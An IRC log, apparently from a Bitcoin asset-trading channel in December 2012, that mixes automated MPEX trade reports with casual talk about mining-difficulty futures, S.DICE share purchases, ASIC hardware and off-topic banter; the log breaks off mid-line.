22:00:41 it touched 13 Dec 14 22:01:09 well ya but i dun trust ta any Dec 14 22:01:25 :D Dec 14 22:01:26 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.52536606 = 525.3661 BTC [-] Dec 14 22:01:27 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.60778466 = 607.7847 BTC [-] Dec 14 22:02:24 28k sold seems like, 5+4 5+4 10 Dec 14 22:02:45 vwap is still 13.59 tho Dec 14 22:02:59 yea Dec 14 22:03:26 [MPEX] [O.BTCUSD.P140T] 78 @ 0.1599 = 12.4722 BTC [-] Dec 14 22:03:28 [MPEX] [O.BTCUSD.P140T] 922 @ 0.17157857 = 158.1954 BTC [+] Dec 14 22:03:29 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.12227209 = 122.2721 BTC [-] Dec 14 22:03:37 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.23049813 = 230.4981 BTC [-] Dec 14 22:05:25 [MPEX] [S.MPOE] 3474 @ 0.00060798 = 2.1121 BTC [-] Dec 14 22:14:16 [MPEX] [S.MPOE] 1546 @ 0.00061572 = 0.9519 BTC [+] Dec 14 22:14:17 [MPEX] [S.MPOE] 8001 @ 0.00062459 = 4.9973 BTC [+] Dec 14 22:17:04 [MPEX] [S.MPOE] 18326 @ 0.00060975 = 11.1743 BTC [-] Dec 14 22:17:05 [MPEX] [S.MPOE] 1239 @ 0.00060491 = 0.7495 BTC [-] Dec 14 22:17:06 [MPEX] [S.MPOE] 2242 @ 0.00060317 = 1.3523 BTC [-] Dec 14 22:27:50 ok, so, when you are mining, are you essentially buying diff, or selling diff by the action of mining? Dec 14 22:28:37 smickles: you're selling a service Dec 14 22:28:42 your work pressures the diff to increase, so you are, in effect selling diff Dec 14 22:28:46 when you are mining you are taking virtual diff and turning it into real diff. Dec 14 22:28:51 what your service is worth is a function of diff and btc prices Dec 14 22:28:56 thus it helps to have a supply of already bought virtual diff Dec 14 22:29:18 so, i had the move wrong Dec 14 22:30:03 if mining is equiv. to selling diff, then buying diff futures nixes it, and any leftover value (the extrinsic value) is profit Dec 14 22:31:33 smickles: what is the future of? Dec 14 22:31:40 the difficulty Dec 14 22:32:07 uh Dec 14 22:32:09 how does that work? Dec 14 22:32:30 http://polimedia.us/bitcoin/mpex.php?mpsic=X.IDIFF.DEC Dec 14 22:32:41 X.IDIFF.DEC settles in BTC on the third Wednesday of December each year before midnight GMT as equal to the network difficulty then current, truncated to an integer and expressed in satoshi. Dec 14 22:32:48 smickles http://mpex.co?mpsic=X.IDIFF.DEC Dec 14 22:32:50 Diablo-D3: ^the relavant part Dec 14 22:32:52 er Dec 14 22:32:59 I dont get how that works Dec 14 22:33:31 it's worth an amount of satoshis equal to the diff rate on dec 19th at midnight Dec 14 22:34:09 so when you mine btc, you are essentially doing the same thing as selling that contract Dec 14 22:34:09 okay so Dec 14 22:34:16 [MPEX] [S.MPOE] 5749 @ 0.00062459 = 3.5908 BTC [+] Dec 14 22:34:16 smickles: okay so wait Dec 14 22:34:17 [MPEX] [S.MPOE] 1071 @ 0.00062706 = 0.6716 BTC [+] Dec 14 22:34:18 [MPEX] [S.MPOE] 6630 @ 0.00062714 = 4.1579 BTC [+] Dec 14 22:34:21 if I want to make money Dec 14 22:34:32 I create the futures, sell them, and then mine like no tommorow? Dec 14 22:34:43 actually Dec 14 22:35:01 i think you buy them Dec 14 22:35:22 well who creates the futures then? Dec 14 22:35:46 anyone Dec 14 22:35:49 because whoever is mining wants to bet the diff will only go up Dec 14 22:36:02 oh, who should do it? Dec 14 22:36:05 no, whoever is mining wants to insure against diff going up Dec 14 22:36:08 [MPEX] [S.MPOE] 7050 @ 0.00061947 = 4.3673 BTC [-] Dec 14 22:36:23 mircea_popescu: if they're playing the future game? Dec 14 22:36:40 because the more mining hardware they own, the more the diff goes up Dec 14 22:36:45 Diablo-D3: mircea_popescu and I are talking about two different things, him: insureance, me arbitrage Dec 14 22:36:58 ahh Dec 14 22:37:01 neither of you make sense to me Dec 14 22:37:19 it's possible to calc a point to buy at where anything on one side of the line is risk free profit Dec 14 22:37:28 *really low risk anyway Dec 14 22:37:37 you'd have to keep the mining farm operating Dec 14 22:37:49 look, it's really simple. you have 1k btc, want to mine. case A : you buy mining gear worth 1k btc. mine. as diff goes up you make less btc from mining Dec 14 22:37:58 smickles: but why wouldnt I just sell mining contracts instead? Dec 14 22:38:06 case B : you buy 900 BTC worth of mining gear and 100 btc worth of diff futures Dec 14 22:38:17 as diff goes up you make less from mining but some money from the future Dec 14 22:38:23 so overall you end up having more money than case A Dec 14 22:38:36 okay, so you DO want diff to go up if you want to win at futures Dec 14 22:38:43 if you buy them yes. Dec 14 22:38:47 if you sell them no. Dec 14 22:38:51 crap Dec 14 22:38:53 that sucks then Dec 14 22:38:58 Diablo-D3: because people shouldn't actually buy those mining contracts, the fact that there is a market for that shit baffles me Dec 14 22:39:15 smickles: well, I was using it as virtual hash power for dmc before we got dmc Dec 14 22:39:23 nefario was kind enough to steal a lot of dmc's money doing that Dec 14 22:40:18 Diablo-D3: what's the max diff increase per occurrance? Dec 14 22:40:30 smickles: Im not sure Dec 14 22:40:33 ask gmaxwell or sipa Dec 14 22:40:58 kk Dec 14 22:41:02 ;;bc,diff Dec 14 22:41:02 3370181.7992778 Dec 14 22:41:34 smickles: its fast enough we can cross that 115x in 24 months if we had the hardware to do it Dec 14 22:43:14 smickles, the future is very good for miners to buy Dec 14 22:43:22 smickles: but we'd have to go from 17TH to like 17EH or something Dec 14 22:43:22 400% Dec 14 22:44:06 the problem is that as hash output increases the 2k blocks go by faster, so the 400% is not related to time Dec 14 22:44:16 you could get 1mn% in a few hours with enough power added Dec 14 22:44:33 mircea_popescu: trying to play that game doesnt work Dec 14 22:44:36 [MPEX] [S.MPOE] 16800 @ 0.00062165 = 10.4437 BTC [+] Dec 14 22:44:51 people were like "what if I power cycled a 51% mining cluster" Dec 14 22:44:52 it doesnt work Dec 14 22:45:01 "not related to time"... it's defined by time, if you just rid your antiquated idea of what time is Dec 14 22:45:02 "work" Dec 14 22:45:06 2016 blocks on, 2016 blocks off Dec 14 22:45:09 lol right lyspooner Dec 14 22:45:10 you cant beat the game that way Dec 14 22:45:41 [MPEX] [S.MPOE] 18020 @ 0.00062714 = 11.3011 BTC [+] Dec 14 22:45:42 [MPEX] [S.MPOE] 7108 @ 0.00062729 = 4.4588 BTC [+] Dec 14 22:47:27 [MPEX] [S.MPOE] 17993 @ 0.00062729 = 11.2868 BTC [+] Dec 14 22:47:29 [MPEX] [S.MPOE] 5907 @ 0.0006273 = 3.7055 BTC [+] Dec 14 22:48:54 lyspooner: well, Ive used difficulty as a unit of time before Dec 14 22:49:07 makes a lot of calculations a lot easier Dec 14 22:49:27 Bitcoin Time is time Dec 14 22:49:55 the blockchain has been described as a distributed timestamp Dec 14 22:50:09 and it sorta is Dec 14 22:51:03 kinda is yea Dec 14 22:51:19 its more of an ordering protocol than anything Dec 14 22:52:18 [MPEX] [S.MPOE] 16672 @ 0.0006241 = 10.405 BTC [-] Dec 14 22:54:10 yes, that incremental blockheader is a very beautiful thing. although the block reward halving party wasn't as exciting as a new years countdown Dec 14 22:54:31 memorylessness of waiting for a block Dec 14 22:54:52 hehe wait for next one, when it goes from 25 to 12.5 Dec 14 22:59:18 [MPEX] [S.MPOE] 1513 @ 0.0006241 = 0.9443 BTC [-] Dec 14 22:59:20 [MPEX] [S.MPOE] 9087 @ 0.00062386 = 5.669 BTC [-] Dec 14 23:00:06 ;;ticker Dec 14 23:00:07 BTCUSD ticker | Best bid: 13.34963, Best ask: 13.36000, Bid-ask spread: 0.01037, Last trade: 13.34963, 24 hour volume: 67793.60594621, 24 hour low: 13.00000, 24 hour high: 13.90119, 24 hour vwap: 13.57774 Dec 14 23:00:52 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.2315999 = 231.5999 BTC [+] Dec 14 23:00:55 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.17242083 = 172.4208 BTC [+] Dec 14 23:01:01 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.12284241 = 122.8424 BTC [+] Dec 14 23:05:06 [MPEX] [S.MPOE] 14093 @ 0.0006273 = 8.8405 BTC [+] Dec 14 23:05:08 [MPEX] [S.MPOE] 2899 @ 0.00062746 = 1.819 BTC [+] Dec 14 23:08:00 http://static.pinboard.in/prosperity_cloud.htm Dec 14 23:09:09 [MPEX] [S.MPOE] 7500 @ 0.00062386 = 4.679 BTC [-] Dec 14 23:10:33 [MPEX] [S.MPOE] 18000 @ 0.00062727 = 11.2909 BTC [+] Dec 14 23:11:19 Each successful applicant will receive $37. This will cover the cost of six months of hosting at prgmr.com and a productivity-enhancing hot beverage. Dec 14 23:11:21 gtfo Dec 14 23:22:51 [MPEX] [S.MPOE] 4321 @ 0.00062398 = 2.6962 BTC [-] Dec 14 23:22:52 [MPEX] [S.MPOE] 4321 @ 0.00062394 = 2.696 BTC [-] Dec 14 23:22:53 [MPEX] [S.MPOE] 4763 @ 0.00062386 = 2.9714 BTC [-] Dec 14 23:22:55 [MPEX] [S.MPOE] 10495 @ 0.00062146 = 6.5222 BTC [-] Dec 14 23:29:26 $37 is all you need to suceed! Dec 14 23:29:43 [MPEX] [S.MPOE] 4321 @ 0.0006215 = 2.6855 BTC [+] Dec 14 23:29:44 [MPEX] [S.MPOE] 9505 @ 0.00062146 = 5.907 BTC [-] Dec 14 23:29:46 [MPEX] [S.MPOE] 3874 @ 0.00061993 = 2.4016 BTC [-] Dec 14 23:30:20 im sick of dubious hacks trying to be viral. Dec 14 23:30:24 [MPEX] [S.MPOE] 7497 @ 0.00061993 = 4.6476 BTC [-] Dec 14 23:30:37 i don't need 37 to succeed and i specifically do not need some nobody giving it to me. Dec 14 23:31:24 c'mon is funny Dec 14 23:33:34 nope Dec 14 23:33:39 i'd say it's unfunny Dec 14 23:45:01 [MPEX] [S.DICE] 1950 @ 0.00337576 = 6.5827 BTC [-] Dec 14 23:50:19 [MPEX] [S.MPOE] 4321 @ 0.00062701 = 2.7093 BTC [+] Dec 14 23:50:20 [MPEX] [S.MPOE] 1133 @ 0.00062727 = 0.7107 BTC [+] Dec 14 23:52:58 [MPEX] [S.MPOE] 4321 @ 0.0006271 = 2.7097 BTC [-] Dec 14 23:53:00 [MPEX] [S.MPOE] 1967 @ 0.00062727 = 1.2338 BTC [+] Dec 14 23:58:34 [MPEX] [S.MPOE] 11901 @ 0.00062746 = 7.4674 BTC [+] Dec 14 23:58:35 [MPEX] [S.MPOE] 1750 @ 0.00062779 = 1.0986 BTC [+] Dec 14 23:58:37 [MPEX] [S.MPOE] 13949 @ 0.00062784 = 8.7577 BTC [+] Dec 15 00:03:05 [MPEX] [S.MPOE] 8250 @ 0.00062729 = 5.1751 BTC [-] Dec 15 00:14:45 ;;ticker Dec 15 00:14:46 BTCUSD ticker | Best bid: 13.54501, Best ask: 13.54502, Bid-ask spread: 0.00001, Last trade: 13.54501, 24 hour volume: 69716.29959509, 24 hour low: 13.00000, 24 hour high: 13.90119, 24 hour vwap: 13.56544 Dec 15 00:14:49 soo... rebound ? Dec 15 00:16:41 pigeons : for your viewing pleasure, i bring you http://imfed.org/ratings/ Dec 15 00:18:12 ;;bc,nethash Dec 15 00:18:13 20297.881954241293 Dec 15 00:18:20 [MPEX] [S.MPOE] 4321 @ 0.00062769 = 2.7122 BTC [+] Dec 15 00:18:21 [MPEX] [S.MPOE] 3679 @ 0.00062784 = 2.3098 BTC [+] Dec 15 00:21:04 [MPEX] [S.MPOE] 2603 @ 0.00062729 = 1.6328 BTC [-] Dec 15 00:21:06 [MPEX] [S.MPOE] 4321 @ 0.00061999 = 2.679 BTC [-] Dec 15 00:21:07 [MPEX] [S.MPOE] 7129 @ 0.00061993 = 4.4195 BTC [-] Dec 15 00:21:08 [MPEX] [S.MPOE] 2450 @ 0.00061947 = 1.5177 BTC [-] Dec 15 00:21:09 [MPEX] [S.MPOE] 2115 @ 0.00061872 = 1.3086 BTC [-] Dec 15 00:23:16 mircea_popescu: who runs that? Dec 15 00:23:44 some new forum kid Dec 15 00:23:58 -pr is making it her life mission to skewer btctalk noobies it seems Dec 15 00:24:06 i guess she's run out of old trolls to bite the heads off Dec 15 00:24:26 the presentation is nice Dec 15 00:25:38 isnt it like stock wp ? Dec 15 00:26:15 pretty close Dec 15 00:27:29 heh, "free vanity addresses" Dec 15 00:28:11 just read scrollback.. so we are bribing asset/passthrough issuers now? and mpex.co :) Dec 15 00:29:03 Hello everyone, my name is Yifu. Despise my fairly-lengthy involvement with Bitcoin, most of you do not know me. Dec 15 00:29:07 gotta love esl Dec 15 00:29:16 jurov :p Dec 15 00:29:23 i also love how people think a month is a long time Dec 15 00:29:40 well... not people per se. investoars. Dec 15 00:30:02 gotta give it to them : they won' be around in 2-3 of those so. their mark must be left in a week preferably. Dec 15 00:30:10 i mean i've been reading this forum for a month, therefore i've got fairly lenghty involvement in the project Dec 15 00:31:15 yeah Dec 15 00:31:24 so in the end avalon actually ships jan ? Dec 15 00:34:19 [MPEX] [S.MPOE] 11408 @ 0.00062518 = 7.1321 BTC [+] Dec 15 00:34:20 [MPEX] [S.MPOE] 1592 @ 0.00062768 = 0.9993 BTC [+] Dec 15 00:34:35 doesnt look like bfl or cable[pair will Dec 15 00:35:29 who banked on avalon ? Dec 15 00:37:43 [MPEX] [S.DICE] 1000 @ 0.00339777 = 3.3978 BTC [+] Dec 15 00:38:08 Let's assume Tom sold 1000 units, that's give or take 50TH/s, Dec 15 00:38:08 Avalon only selling 300 units first batch, ~20TH. Dec 15 00:38:08 BFL sells a crazy estimate of 2000 units, 120TH. Dec 15 00:38:10 [MPEX] [S.DICE] 244 @ 0.00339777 = 0.8291 BTC [+] Dec 15 00:38:14 ahh, the sweet days of october Dec 15 00:39:46 maybe that was already discussed, but what if i do 1.mkfut 2. sell all the futures 3. difficulty skyrockets Dec 15 00:40:04 they'll get forcibly liquidated even if nwner is different now? Dec 15 00:40:07 [MPEX] [S.MPOE] 4321 @ 0.00061877 = 2.6737 BTC [-] Dec 15 00:40:09 [MPEX] [S.MPOE] 11279 @ 0.00061872 = 6.9785 BTC [-] Dec 15 00:40:11 *owner Dec 15 00:40:18 jurov YOUR collateral is what gets wiped. Dec 15 00:40:24 the new owner gets it Dec 15 00:41:05 ok, but what if i did not have enough collateral? Dec 15 00:41:53 new owner will suddenly see the futures liquidated? Dec 15 00:42:19 yeah. Dec 15 00:42:21 Also unlike other futures contracts X.IDIFF.* are not subject to an insurance fee. Consequently, in the event of a net seller's deposited collateral being exceded by current difficulty a proportional number of open contracts will be forcibly liquidated. Dec 15 00:44:15 interesting Dec 15 00:44:23 101`179.33038841 BTC klalala Dec 15 00:44:35 jurov it's a little kludgy, but i see no other way to do it. Dec 15 00:44:50 hopefully mining market matures soon and we can move to a saner method Dec 15 00:51:11 in the meantime, asic suppliers have got ideal instrument for insider trading Dec 15 00:52:18 as using them to mine bears the risk someone spotting them Dec 15 00:58:23 [MPEX] [S.MPOE] 300 @ 0.00062273 = 0.1868 BTC [+] Dec 15 01:00:13 so they buy diff before they deliver cause thye know they will ? Dec 15 01:01:56 Why not? Dec 15 01:02:23 [MPEX] [S.MPOE] 4021 @ 0.00062273 = 2.504 BTC [+] Dec 15 01:02:24 [MPEX] [S.MPOE] 8979 @ 0.00062262 = 5.5905 BTC [-] Dec 15 01:02:25 I'd abuse the heck out of those futures if I knew I was about to dump massive hashing into the network. Dec 15 01:04:01 [MPEX] [S.MPOE] 17271 @ 0.00062262 = 10.7533 BTC [-] Dec 15 01:04:02 [MPEX] [S.MPOE] 2379 @ 0.00061872 = 1.4719 BTC [-] Dec 15 01:06:14 [MPEX] [S.MPOE] 7750 @ 0.00062431 = 4.8384 BTC [+] Dec 15 01:06:16 [MPEX] [S.MPOE] 2729 @ 0.00062768 = 1.7129 BTC [+] Dec 15 01:06:17 [MPEX] [S.MPOE] 2272 @ 0.00062784 = 1.4265 BTC [+] Dec 15 01:06:18 [MPEX] [S.MPOE] 9530 @ 0.00062848 = 5.9894 BTC [+] Dec 15 01:06:19 [MPEX] [S.MPOE] 719 @ 0.00062914 = 0.4524 BTC [+] Dec 15 01:07:19 Well I'm lacking 21.25 BTC on my loan for it to get funded, expiring in ~ an hour: https://btcjam.com/listings/899 Dec 15 01:07:51 Anyone can fill that last stretch? Dec 15 01:11:43 guruvan seems to have lost it Dec 15 01:13:59 [MPEX] [S.MPOE] 4321 @ 0.0006189 = 2.6743 BTC [-] Dec 15 01:14:00 [MPEX] [S.MPOE] 6979 @ 0.00061872 = 4.318 BTC [-] Dec 15 01:20:03 dub what he do ? Dec 15 01:20:18 Namjies in principle i can see it. Dec 15 01:20:45 [MPEX] [S.MPOE] 4321 @ 0.00062881 = 2.7171 BTC [+] Dec 15 01:20:47 [MPEX] [S.MPOE] 11881 @ 0.00062914 = 7.4748 BTC [+] Dec 15 01:20:48 [MPEX] [S.MPOE] 9148 @ 0.00062962 = 5.7598 BTC [+] Dec 15 01:20:49 [MPEX] [S.MPOE] 14350 @ 0.00062973 = 9.0366 BTC [+] Dec 15 01:31:36 no one use MPW this time. include us, BFL ,bASIC, asicminer, etc. Dec 15 01:31:36 just like a Chinese network catchword: we are all fighting without pants. (我们都已经脱了裤子干了) Dec 15 01:31:47 i guess today i learned how you spell insanity in chinese. Dec 15 01:33:09 mpw? Dec 15 01:33:57 ;;bc,diff Dec 15 01:33:57 3370181.7992778 Dec 15 01:35:28 yeah. Dec 15 01:35:33 multi project Dec 15 01:35:51 like a proper run but for 1/50 of cost Dec 15 01:37:12 oh, that Dec 15 01:39:25 [MPEX] [S.MPOE] 4321 @ 0.00062163 = 2.6861 BTC [-] Dec 15 01:39:27 [MPEX] [S.MPOE] 17629 @ 0.00062161 = 10.9584 BTC [-] Dec 15 01:40:16 [MPEX] [S.DICE] 58823 @ 0.0034 = 199.9982 BTC [+] Dec 15 01:43:20 [MPEX] [S.MPOE] 4321 @ 0.00062944 = 2.7198 BTC [+] Dec 15 01:43:21 [MPEX] [S.MPOE] 4321 @ 0.00062969 = 2.7209 BTC [+] Dec 15 01:43:23 [MPEX] [S.MPOE] 5650 @ 0.00062973 = 3.558 BTC [+] Dec 15 01:43:24 [MPEX] [S.MPOE] 14800 @ 0.00063006 = 9.3249 BTC [+] Dec 15 01:43:25 [MPEX] [S.MPOE] 12573 @ 0.00063011 = 7.9224 BTC [+] Dec 15 01:44:01 there is now a spread on idiff.mar Dec 15 01:44:38 [MPEX] [S.DICE] 265 @ 0.0034 = 0.901 BTC [+] Dec 15 01:48:22 [MPEX] [S.MPOE] 5214 @ 0.00062313 = 3.249 BTC [-] Dec 15 01:48:46 ahaha Dec 15 01:49:02 ;;calc 0.00000823/0.1395 Dec 15 01:49:03 5.89964157706e-05 Dec 15 01:49:14 ;;calc 1-0.00000823/0.1395 Dec 15 01:49:15 0.999941003584 Dec 15 01:49:25 what's a 99,994% spread lmao Dec 15 01:55:20 [MPEX] [S.DICE] 100000 @ 0.0034 = 340 BTC [+] Dec 15 01:58:12 heh nice quote Dec 15 01:58:35 guns dont kill people, people who say 'guns dont kill people' kill people with guns Dec 15 01:58:55 [MPEX] [S.DICE] 300000 @ 0.0034 = 1020 BTC [+] Dec 15 02:00:40 [MPEX] [S.DICE] 300000 @ 0.0034 = 1020 BTC [+] Dec 15 02:01:14 eh Dec 15 02:01:41 !ticker s.dice Dec 15 02:01:44 [MPEX:S.DICE] 1day: 0.00328789 / 0.00339807 / 0.0034 (930860 shares, 3,163.13 BTC), 30day: 0.00308319 / 0.00337654 / 0.0034 (2870204 shares, 9,691.38 BTC) Dec 15 02:01:51 [MPEX] [S.DICE] 300000 @ 0.0034 = 1020 BTC [+] Dec 15 02:02:11 lol, people like the dividends eh Dec 15 02:03:48 I dont Dec 15 02:03:53 they're disgusting things Dec 15 02:04:22 it sold like... 3.5-4k in the past half hour Dec 15 02:04:34 the fuck. Dec 15 02:04:44 the _fuck_ Dec 15 02:04:49 did the bot just get stuck or what? Dec 15 02:05:02 for those sorts of sums i doubt it Dec 15 02:05:17 three identical orders totaling 3k? Dec 15 02:06:20 comes to 1mn if you take the other 100k one Dec 15 02:06:24 and a 60k before Dec 15 02:07:10 [MPEX] [S.DICE] 18500 @ 0.0034 = 62.9 BTC [+] Dec 15 02:14:23 [MPEX] [S.DICE] 320000 @ 0.0034 = 1088 BTC [+] Dec 15 02:17:04 airjaerkfd;c' Dec 15 02:18:40 [MPEX] [X.INKG] 150 @ 0.07458535 = 11.1878 BTC [+] Dec 15 02:19:10 heh that 34k block is like half gone. Dec 15 02:20:44 [MPEX] [S.MPOE] 2524 @ 0.00062162 = 1.569 BTC [-] Dec 15 02:20:46 [MPEX] [O.BTCUSD.C120T] 725 @ 0.22344233 = 161.9957 BTC [-] Dec 15 02:21:56 [MPEX] [X.ISP5] 550 @ 0.10152287 = 55.8376 BTC [-] Dec 15 02:22:45 [MPEX] [S.MPOE] 1797 @ 0.00062162 = 1.1171 BTC [-] Dec 15 02:22:46 [MPEX] [S.MPOE] 23171 @ 0.00062161 = 14.4033 BTC [-] Dec 15 02:22:47 [MPEX] [S.MPOE] 18400 @ 0.00062039 = 11.4152 BTC [-] Dec 15 02:22:48 [MPEX] [S.MPOE] 4698 @ 0.00061872 = 2.9067 BTC [-] Dec 15 02:22:49 [MPEX] [S.MPOE] 15400 @ 0.00061846 = 9.5243 BTC [-] Dec 15 02:22:50 [MPEX] [S.MPOE] 13100 @ 0.00061837 = 8.1006 BTC [-] Dec 15 02:22:51 [MPEX] [S.MPOE] 3700 @ 0.00061804 = 2.2867 BTC [-] Dec 15 02:22:53 [MPEX] [S.MPOE] 8550 @ 0.00061771 = 5.2814 BTC [-] Dec 15 02:22:54 [MPEX] [S.MPOE] 2500 @ 0.00061402 = 1.5351 BTC [-] Dec 15 02:22:55 [MPEX] [S.MPOE] 19300 @ 0.00061071 = 11.7867 BTC [-] Dec 15 02:22:56 [MPEX] [S.MPOE] 9000 @ 0.00061064 = 5.4958 BTC [-] Dec 15 02:22:57 [MPEX] [S.MPOE] 10400 @ 0.0006095 = 6.3388 BTC [-] Dec 15 02:22:57 [MPEX] [S.MPOE] 16600 @ 0.00060938 = 10.1157 BTC [-] Dec 15 02:22:58 [MPEX] [S.MPOE] 27400 @ 0.0006087 = 16.6784 BTC [-] Dec 15 02:22:59 [MPEX] [S.MPOE] 19148 @ 0.00060854 = 11.6523 BTC [-] Dec 15 02:23:00 [MPEX] [S.MPOE] 9669 @ 0.00060793 = 5.8781 BTC [-] Dec 15 02:23:01 [MPEX] [S.MPOE] 17858 @ 0.00060317 = 10.7714 BTC [-] Dec 15 02:23:02 [MPEX] [S.MPOE] 19309 @ 0.00060027 = 11.5906 BTC [-] Dec 15 02:47:26 mircea_popescu: i'm gonig to get you investors Dec 15 02:47:35 a ? Dec 15 02:47:54 I'm going to solicit rich people to give me money then I'll give it to you Dec 15 02:48:20 solid plan right? Dec 15 02:48:44 lol Dec 15 02:48:48 [MPEX] [S.MPOE] 1686 @ 0.00062313 = 1.0506 BTC [+] Dec 15 02:49:25 srsly Dec 15 02:49:38 I know a few people who are sitting on fiat Dec 15 02:49:44 Diablo-D3 https://bitcointalk.org/index.php?topic=120184.msg1383654#msg1383654 lmao chinese people insulting each other is a riot Dec 15 02:49:44 I know a good person to give that to :) Dec 15 02:49:58 what am i gonna do with fiat ? Dec 15 02:50:04 I tried to put a stop to this one Dec 15 02:50:06 I'm going to convert it to btc first Dec 15 02:50:07 I gave up Dec 15 02:50:11 and make it look like a fiat investment Dec 15 02:50:19 and just funnel fiat into btc via mpex Dec 15 02:51:27 i had no idea you could do that. Dec 15 02:52:22 if someone gave me 10,000 dollars I would just put that into btc then give you the btc Dec 15 02:52:28 when I say you I mean mpex Dec 15 02:52:38 he doesn't need it Dec 15 02:52:47 give it to me, i'll do interesting things with it Dec 15 02:53:18 but he can give me an roi :P Dec 15 02:53:31 can you give me a solid investment platform pigeons for my investors? Dec 15 02:53:52 oh no return Dec 15 02:54:00 i was gonna spend it Dec 15 02:54:03 :P Dec 15 02:55:36 lol on btc jam Dec 15 02:55:54 thestringpuller actually s.dice looks set to make 5ish % this month Dec 15 02:56:38 ;;calc .05 * 10000 Dec 15 02:56:39 500 Dec 15 02:56:41 lol Dec 15 02:57:39 I think MPOE has more value to the community than DICE Dec 15 02:57:56 apparently so think many others Dec 15 02:58:00 it's like 2x the price Dec 15 02:58:53 o look, it's the man himself. Dec 15 02:58:56 I think the future market is a good start, once you're able to buy manufacturing level volumes of commodities, people may use BTC as a primary trade vehile. Dec 15 02:59:00 vehicle* Dec 15 02:59:10 bonjour mircea Dec 15 02:59:15 thestringpuller i been trying to get futures with phys delivery for a year now Dec 15 02:59:21 it's insanely hard cause of legal lockdown Dec 15 02:59:32 evoorhees everyone's in awe of s.dice here :D Dec 15 02:59:36 exactly, government sponsored monopoly it is Dec 15 02:59:46 not me, I think it's run by the mafia Dec 15 02:59:49 in what way do you mean, mircea? Dec 15 03:00:05 in the way of omg wtf 15k+ Dec 15 03:00:33 it's never earned 15k+ in one day Dec 15 03:00:45 current month tho. or are my figures off ? Dec 15 03:00:48 [MPEX] [S.MPOE] 4321 @ 0.0006298 = 2.7214 BTC [+] Dec 15 03:00:50 [MPEX] [S.MPOE] 939 @ 0.00063011 = 0.5917 BTC [+] Dec 15 03:00:51 [MPEX] [S.MPOE] 18090 @ 0.00063048 = 11.4054 BTC [+] Dec 15 03:00:52 oh for the month... hehe yes Dec 15 03:01:07 well, slightly less than that for Dec so far Dec 15 03:01:23 more like 12k Dec 15 03:01:27 was it seriously macau ppl betting like crazy ? Dec 15 03:01:40 nobody from macau Dec 15 03:01:43 a Dec 15 03:01:52 we were introducing people there to bitcoin Dec 15 03:02:03 it'll be a while before those connections make their way to bitcoinland Dec 15 03:02:11 evoorhees: I thought you'd be too busy having fun in New York to drop in on us. Dec 15 03:02:14 no store in macau yet to buy btc :) Dec 15 03:02:35 actually I'm stuck in bed right now cause a fucking spider bit me and it got infected Dec 15 03:02:46 ouch Dec 15 03:02:51 so I'm on antibiotics and have to keep my leg elevated Dec 15 03:02:52 now you'll get super powers no? Dec 15 03:02:56 I'm hoping Dec 15 03:03:02 those things suck Dec 15 03:03:15 yeah :( Dec 15 03:03:39 [MPEX] [S.MPOE] 4321 @ 0.00063037 = 2.7238 BTC [-] Dec 15 03:03:40 [MPEX] [S.MPOE] 6156 @ 0.00063048 = 3.8812 BTC [+] Dec 15 03:03:41 [MPEX] [S.MPOE] 11144 @ 0.0006306 = 7.0274 BTC [+] Dec 15 03:04:10 we should get phys delivery of cocoa by doing a deal with the columbian cartels Dec 15 03:04:27 MAKE THIS HAPPEN, ASSHOLES: https://petitions.whitehouse.gov/petition/define-westboro-baptist-church-hate-group-due-promoting-animosity-against-differing-cultural/xHF0d3nq?utm_source=wh.gov&utm_medium=shorturl&utm_campaign=shorturl Dec 15 03:05:08 yes because signatures from romanian mobsters will help so much Dec 15 03:05:09 i thought cocoa mostly comes from africa/ivory coast Dec 15 03:05:22 there is a large amount of it grown in south america Dec 15 03:05:32 unless it's changed Dec 15 03:05:37 Diablo... that's a stupid petition lol Dec 15 03:05:41 https://petitions.whitehouse.gov/petition/secure-resources-and-funding-and-begin-construction-death-star-2016/wlfKzFkN Dec 15 03:05:55 now that's a good petition Dec 15 03:06:19 bleh... just another big government program Dec 15 03:06:31 not the worst I've seen though ;) Dec 15 03:07:10 Ukto: you didn't get eskimobob either https://www.litecoinglobal.com/security/ART Dec 15 03:07:11 I would say eCommerce is the worst Dec 15 03:07:56 pigeons is this the mugmaking entreprise ? Dec 15 03:08:34 well the mugs were to get btc people interesting in giving a little coin to the effort to get a kiln Dec 15 03:08:35 EskimoBob never gives up Dec 15 03:09:06 pigeons: it happens Dec 15 03:09:11 yeah Dec 15 03:09:15 outlast Dec 15 03:09:31 I am not afraid of the competition that I will go mudslinging everywhere Dec 15 03:09:39 heh Dec 15 03:09:51 I have made arrangements for some assets now Dec 15 03:10:19 mircea_popescu: the idea you had about certified code review, why not extend that to a code-factory Dec 15 03:12:33 ;;seen smickles Dec 15 03:12:33 smickles was last seen in #bitcoin-assets 1 hour, 28 minutes, and 31 seconds ago: there is now a spread on idiff.mar Dec 15 03:12:58 that may be an idea. Dec 15 03:13:21 heey evoorhees Dec 15 03:13:31 well the thing is mircea_popescu is that with the growing complexity of building code, it may be better for there to be an architect who can design it and to have code monkey's build it Dec 15 03:13:39 that sound like a pita x,x Dec 15 03:14:12 hi ukto Dec 15 03:14:40 maybe. Dec 15 03:15:30 evoorhees: sounds ike a great dividend month comming up :P Dec 15 03:16:01 I will probably be buying some shares myself via Terra once he gets things listed Dec 15 03:16:12 best month yet, by far Dec 15 03:16:46 although I was planning to avoid buying shares on my own exchange, I really don't see much of a problem with it Dec 15 03:16:55 *but Dec 15 03:19:15 I feel like giving dividends to shareholders is a waste of capital Dec 15 03:19:22 use that money to give bonuses to the CEO's Dec 15 03:24:27 hrm Dec 15 03:37:41 i should raise bitcoins to make dexter's lab Dec 15 03:38:33 [MPEX] [S.MPOE] 12900 @ 0.00063005 = 8.1276 BTC [-] Dec 15 03:38:33 [MPEX] [S.MPOE] 6000 @ 0.00062528 = 3.7517 BTC [-] Dec 15 03:39:24 haha! i got assbot and all the split people can't see it. Dec 15 03:43:02 [MPEX] [S.DICE] 1245517 @ 0.0034 = 4234.7578 BTC [+] Dec 15 03:48:40 mircea_popescu: come again? Dec 15 03:48:53 netsplit Dec 15 03:48:58 whoa Dec 15 03:49:01 !ticker s.dice Dec 15 03:49:03 [MPEX:S.DICE] 1day: 0.00328789 / 0.0033994 / 0.0034 (2813127 shares, 9,562.97 BTC), 30day: 